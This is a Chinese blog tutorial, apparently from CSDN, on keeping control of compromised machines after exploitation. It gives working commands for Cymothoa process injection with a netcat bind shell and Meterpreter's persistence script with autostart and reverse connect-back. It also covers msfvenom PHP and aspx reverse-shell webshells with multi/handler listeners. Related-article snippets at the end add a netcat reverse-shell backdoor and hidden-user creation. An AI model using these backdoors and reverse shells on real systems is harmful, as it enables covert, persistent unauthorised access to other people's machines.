后渗透之各种维持权限的后门原理即利用

最新推荐文章于 2024-09-17 14:32:57 发布
最新推荐文章于 2024-09-17 14:32:57 发布
阅读量3.8k 收藏 10
点赞数 2
分类专栏: 后渗透内网提权 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/108559672
版权

前言

在拿到最高权限后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。
后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。
在这里插入图片描述

操作系统后门

后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persistence等后渗透攻击模块,通过在目标机上安装自启动、永久服务等方式,来长久地控制目标机。在这里插入图片描述

操作系统之Cymothoa后门

Cymothoa是一款可以将ShellCode注入现有进程 (即插进程)的后门工具。借助这种注入手段,它能够把ShellCode伪装成常规程序。它所注入的后门]程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将ShellCode注入其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,就发现不了(插进程)后门程序的进程。
值得一提的是该后门注入系统的某一进程, 反弹的是该进程相应的权限(并不需要root)。当然,因为后门是以运行中的程序为宿主,所以只要进程关闭或者目标主机重启,后门就会停止运行。
首先可查看程序的PID (在Linux系统下输入ps -aux命令,在Windows系统下输入tasklist命令)
在这里插入图片描述
在这里插入图片描述
在使用Cymothoa时,需通过-p选项指定目标进程的PID,并通过-S选项指定ShellCode的编号, ShellCode的编号列表如下:

root@kali:~# cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd

成功渗透目标主机后,就可以把Cymothoa的可执行程序复制到目标主机上,生成后门程序。这里选择PID为982的进程为宿主进程,选用第一类ShellCode,指定Payload服务端口为4444,具体命令如下:

cymothoa -p 982 -S 1 -y 4444

然后可以利用nc来连接后门

nc -nv IP 端口号

操作系统之persistence后门

一款使用安装自启动方式的持久性后门程序,可以利用它创建注册和文件。
首先run persistence -h查看用到的所有命令选项

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

命令的详解

A:自动启动Payload程序
S:系统启动时自动加载
U:用户登录时自动启动
X:开机时自动加载
i:回连的时间间隔
P:监听反向连接端口号
r:目标机器IP地址

接着输入命令创建一个持久性后门

meterpreter > run persistence -A -S -U -i 60 -P 4321 -r 192.168.43.86

然后输入sessions命令查看是否成功获得了会话

web后门

web后门泛指webshell其实就是一段代码,由于这些代码允许在服务端,所以可以进行一些危险的操作获得敏感的技术信息或者通过渗透操作提权,从而获得了服务器的控制权。
web后门能给攻击者提供非常多的功能(命令执行、浏览文件、辅助提权、执行sql语句、反弹shell等)

windows:中国菜刀、蚁剑等
linux:weevely

web之meterpreter后门

在metasploit中,有一个名为php meterpreter的payload利用这个模块可创建具有meterpreter功能的php webshell步骤如下:

使用msfvenom创建一个webshell.php
上传webshell.php到服务器
运行metasploit multi-handler开始监听
访问webshell.php页面
获得反弹的metasploit shell

首先第一步创建

-p参数用于设置payload
-f参数用于设置输出文件格式

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.113 -f raw >webshell.php

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1115 bytes

然后将生成的webshell.php上传到目标机的服务器上,打开webshell的地址,接着启动msfconsole


msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.86
lhost => 192.168.43.86
msf5 exploit(multi/handler) > run

打开webshell的地址,回到msf发现已经反弹到了shell

web之aspx meterpreter后门

利用metasploit下名为shell_reverse_tcp的payload可创建具有meterpreter功能的各个版本的shellcode步骤如下:

show payloads
use windows/shell_reverse_tcp
info
set lhost ip
set lport 端口号
save

接着输入generate -h命令查看帮助

msf5 payload(windows/shell_reverse_tcp) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce approproate NOPsled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -s <opt>  NOP sled length.
    -x <opt>  Specify a custom executable file to use as a template

设置监听,等待点击就行了


msf5 payload(windows/shell_reverse_tcp) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.86
lhost => 192.168.43.86
msf5 exploit(multi/handler) > set lport 5432
lport => 5432
msf5 exploit(multi/handler) > run

[-] Handler failed to bind to 192.168.43.86:5432:-  -
[*] Started reverse TCP handler on 0.0.0.0:5432

在这里插入图片描述

p_utao
关注
专栏目录
内网渗透-window权限维持
lza20001103的博客
09-26 2259
window权限维持 文章目录window权限维持前言meterpreter权限维持persistencemetsvc系统工具替换后门iexplore.exenarratoroskutilmannotepadmsf模块开机自启动注册表项nc后门schtasks快捷方式劫持账号隐藏后记 前言 上期讲完了横向移动后,我们拿到了管理员的权限,当我们离开时,下一次要是还想拿到的是管理员的权限呢,难道我们还要继续一波操作提取啥的吗,其实不然,接下来将是最重要的内容,就是我们的权限维持的操作了,对于后渗透有着至关重要的
内网权限维持 —— 后门
战神/calmness的博客
12-09 1214
目录 操作系统后门 粘滞键 注册表注入 计划任务 meterpreter Cymothoa WMI型 web 后门 Nishang 下的webshell weevely webacoo ASPX meterpreter PHP meterpreter 域控制器权限持久化 DSRM 域后门 SSP 维持域控权限 SID History 域后门 Golden Ticket Silver Ticket Skeleton Key Hook PasswordChangeNot
FTP服务后门利用
小锤队长的博客
10-30 1558
靶场: ubuntu 192.168.142.128 攻击机: kali 192.168.11.165 信息收集: 探测服务信息: nmap -sV 192.168.142.128 可以看到靶机开启了 21 ftp服务,版本号为ProFTPD 1.3.3c 使用 searchsploit 查看漏洞信息,找到可以利用的溢出代码 可以看到有两个可以用的漏洞, 第一个是 远...
Rootkit 后门利用
m0_46239567的博客
05-14 1182
1.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行系统服务及版本扫描 渗透测试,并将该操作显示结果中 SSH 服务版本信息字符串作为 FLAG 提交; 2.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行 SSH 暴力破解,将破 解 成 功 的 密 码 作 为 FLAG 提 交 ; ( 用 户 名 : root, 字 典 文 件 /usr/share/wordlists/dirb/small.txt) 使用......
alias 后门从入门到应急响应
最新发布
记录开发和安全学习过程中的点点滴滴
09-17 1326
Linux系统中,alias命令通常用于为常用的命令设置快捷方式或别名,以提高工作效率。然而,这个特性也可能被滥用来创建后门,允许攻击者在不知情的情况下执行恶意命令。
渗透——权限维持
FisrtBqy的博客
04-26 2244
权限维持 1 Windows权限维持 1.1 用户维持(克隆账号) 1.1.1 添加一般隐藏用户的方式 net user username$ passwd /add 使用net user命令查看用户,发现没有username$这个用户 但是通过控制面板→管理账户中可以看到该用户。 1.1.2 注册表克隆用户隐藏 需要先完成上一步🙄 打开注册表编辑器:Win+R→regedit,找到如下路径: 发现SAM路径下没有权限查看,这里修改权限:菜单栏编辑→权限,修改后F5刷新
ftp服务后门利用
Vinson的博客
09-24 688
FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。 searchsploit +版本 查看漏洞信息,找到可利用的溢出代码 需要修改这个文件造成溢出 使用Metasploit进行溢出(用msfconsole打开) 1、输入search对应软件和版本号 2、use exploit 3、查看可以使...
渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4423
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2929
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
内网渗透——权限维持
cldimd的博客
03-23 1231
一、权限维持: 当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。 由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门维持权限,达到持续控制的目的。 二、获取windows系统登陆账号: 系统登陆账号存储位置:C:\Windows\System32...
Metasploit渗透测试之制作隐藏后门利用SQL注入进行渗透
Metasploit实际上是一个软件平台,它包括Metasploit框架、实验室、模块和资源,这些可以帮助您完成各种安全任务,包括渗透测试、漏洞研究、安全教育以及解决实际安全问题。 ## 解释隐藏后门的概念和重要性 隐藏...
【实验】一句话后门利用及操作
weixin_34247299的博客
10-13 356
准备中
Winrm后门在实战中的巧妙应用
slash_HK的博客
02-25 983
winrm后门在实战中的巧妙应用 在权限维持阶段,有很多方法来做权限稳固,但是对于一台服务器来讲,我们可以利用端口复用打造隐蔽winrm后门,从而对机器进行稳定控制。
常见系统后门技术总结与分析利用
m0_61869253的博客
08-09 944
在本文的很多例子中,其实都会或多或少与一个东西有关,那就是注册表。关于注册表,我觉得值得花时间去仔细研究一番,一定会有很大的收获。关于系统后门技术其实还有许许多多,本文只是将常见的一些技术拿出来进行了分享,希望可以对大家的学习有帮助。如有不对,欢迎指正。[外链图片转存中…(img-qhddTgV9-1691466893281)][外链图片转存中…(img-t4tuwy48-1691466893282)]
后台权限维持技术
a15914389907的博客
05-07 275
  一般情况下,黑客拿下一个服务器之后可能会提交漏洞平台,服务器管理员在修复过程中常常会将后台登陆密码等口令进行重新配置   黑客也因此在漏洞修复后极可能失去对网站的控制权,那么有什么方法可以来让黑客维持对网站后台的管理权限吗?   这里介绍一个好方法:   前提:    1、在网上注册一个XSS平台账户或自行搭建XSS平台   2、拿到网站webshell权限,可以对网...
Linux权限维持之suid后门、ssh后门
Longwaer
01-07 3328
通过笔记详细讲解SUID、SSH后门小技巧,更加高效的熟练掌握Linux提权方法。
Metasploit(后渗透攻击:操作系统后门
qq_41453632的博客
12-10 3703
   在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 1.Cymothoa后门    Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进...
渗透后门_三大渗透测试框架权限维持技术
weixin_36115475的博客
01-09 796
0x00 前言在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?0x01 MSF权限维持使用MSF维持权限的前提是先获得一个meterpreter shell,通过meterpreter shell获取持久性shell的方法有两种:Persistence模块通过启动项...
系统渗透与防护——后门植入与SUID提权
m0_60643467的博客
10-09 2019
Msfvenom Msfvenom是MSF框架配套的攻击载荷生成器,可以用来生成木马程序,并在目标机上执行,在本地监听上线。 部分参数 -p:选择一个载荷 -f:生成的文件格式 -lhost:监听地址 -lport:监听端口 -o:输入文件名 -h:帮助 Msfvenom实验测试 Msfvenom生成后门文件 第一步,在kali生成后门文件 第二步,开启Linux靶机的root用户,并设置密码 上传后门文件至靶机 第三步,在kali中将后门文件发送到目标主机 在
kali linux权限维持,权限维持篇-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统上维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在Kali Linux中创建NC后门的步骤: 1. 在Kali Linux中打开终端,并输入以下命令来生成一个反向Shell: ``` msfvenom -p cmd/unix/reverse_netcat lhost=<攻击者IP> lport=<攻击者端口> -f raw > nc_backdoor ``` 2. 接下来,使用以下命令将生成的反向Shell作为后门上传到受攻击系统: ``` nc -nv <受攻击系统IP> <受攻击系统端口> < nc_backdoor ``` 3. 等待受攻击系统连接到攻击者的系统,然后使用以下命令打开一个监听器: ``` nc -nlvp <攻击者端口> ``` 4. 当受攻击系统连接到攻击者的系统时,攻击者将获得一个Shell,可以在其中执行任意命令。 请注意,NC后门只是权限维持的一种方法,攻击者可能会使用其他技术来维持其访问权限,因此在Kali Linux中学习权限维持是至关重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值